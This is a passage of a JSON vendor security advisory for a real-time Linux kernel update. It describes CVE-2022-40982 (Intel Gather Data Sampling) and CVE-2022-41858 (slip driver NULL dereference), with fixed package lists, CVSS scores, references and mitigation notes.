"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query"
},
{
"cve": "CVE-2022-40982",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2023-07-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2223949"
}
],
"notes": [
{
"category": "description",
"text": "A Gather Data Sampling (GDS) transient execution side-channel vulnerability was found affecting certain Intel processors. This issue may allow a local attacker using gather instruction (load from memory) to infer stale data from previously used vector registers on the same physical core.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "hw: Intel: Gather Data Sampling (GDS) side channel vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-40982"
},
{
"category": "external",
"summary": "RHBZ#2223949",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2223949"
},
{
"category": "external",
"summary": "RHSB-7027704",
"url": "https://access.redhat.com/solutions/7027704"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-40982",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40982"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-40982",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40982"
},
{
"category": "external",
"summary": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html"
}
],
"release_date": "2023-08-08T06:30:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "The vulnerability can be mitigated by installing the CPU microcode package microcode_ctl version 20230808.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "hw: Intel: Gather Data Sampling (GDS) side channel vulnerability"
},
{
"acknowledgments": [
{
"names": [
"Duoming Zhou"
]
}
],
"cve": "CVE-2022-41858",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2022-11-21T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2144379"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-41858"
},
{
"category": "external",
"summary": "RHBZ#2144379",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144379"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-41858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41858"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-41858",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41858"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/ec4eb8a86ade4d22633e1da2a7d85a846b7d1798",
"url": "https://github.com/torvalds/linux/commit/ec4eb8a86ade4d22633e1da2a7d85a846b7d1798"
}
],
"release_date": "2022-04-05T15:30:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by preventing the affected slip driver from loading during the boot time, and ensuring the module is added to the blacklist file.\n~~~\nRefer: \nHow do I blacklist a kernel module to prevent it from loading automatically? \nhttps://access.redhat.com/solutions/41278\n~~~",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
